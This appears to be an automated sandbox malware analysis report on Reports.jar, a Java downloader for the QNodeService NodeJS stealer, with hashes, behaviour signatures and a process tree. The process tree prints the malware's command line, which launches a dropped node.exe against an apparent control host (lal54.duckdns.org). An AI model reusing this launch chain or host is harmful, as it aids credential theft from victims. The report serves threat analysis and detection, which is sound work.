Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-11-2020 10:12
Static task
static1
Behavioral task
behavioral1
Sample
Reports.jar
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Reports.jar
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
Reports.jar
-
Size
54KB
-
MD5
6b6655ba29db159bd71a97864c6f6cc5
-
SHA1
cda3d5265f3349720e30bc22e3136c401707add2
-
SHA256
513f8d26cafd992200610473c26cb427a5e328b9247b1313fdde5ad151cfa9ed
-
SHA512
096ed83211fe99a2d6b41bf3db026c08ac11dcefad733248e33b15d35aa8c52851dce36ca5d214b0015e13d87ea255489a63a5148abd5790f6761e3f68738500
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 1 IoCs
pid Process 3304 node.exe -
JavaScript code in executable 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ab77-161.dat js -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3304 node.exe 3304 node.exe 3304 node.exe 3304 node.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 492 wrote to memory of 3288 492 java.exe 76 PID 492 wrote to memory of 3288 492 java.exe 76 PID 3288 wrote to memory of 3304 3288 javaw.exe 80 PID 3288 wrote to memory of 3304 3288 javaw.exe 80
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Reports.jar1⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\613dfde4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain lal54.duckdns.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3304
-
-